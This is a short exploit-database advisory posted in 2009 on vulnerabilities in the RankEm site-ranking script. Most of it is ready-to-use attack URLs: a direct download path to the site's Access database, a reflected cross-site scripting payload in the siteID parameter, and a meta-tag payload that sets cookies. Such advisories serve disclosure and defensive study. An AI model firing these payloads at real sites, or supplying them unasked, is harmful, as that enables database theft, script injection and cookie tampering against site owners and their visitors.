id: 4689
date: 01/16/2009
title: RankEm (DD/XSS/CM) Multiple Remote Vulnerabilities
author: Pouya_Server
cves: 

==================================================
RankEm (DD/XSS/CM) Multiple Remote Vulnerabilities
==================================================


#########################################################
---------------------------------------------------------
Portal Name: RankEm
Download : http://www.katywhitton.com/downloads/rankEm/rankEmDL.zip
Author : Pouya_Server , Pouya.s3rver@Gmail.com
Vulnerability : (DD/XSS/CM)
---------------------------------------------------------
#########################################################
[DD]:
http://site.com/[Path]/database/topsites.mdb
[XSS]:
http://site.com/rankup.asp?siteID=<script>alert(1369)</script>
[CM]:
http://site.com/rankup.asp?siteID=<meta+http-equiv='Set-cookie'+content='cookiename=cookievalue'>
---------------------------------



#  0day.today [2023-03-25]  #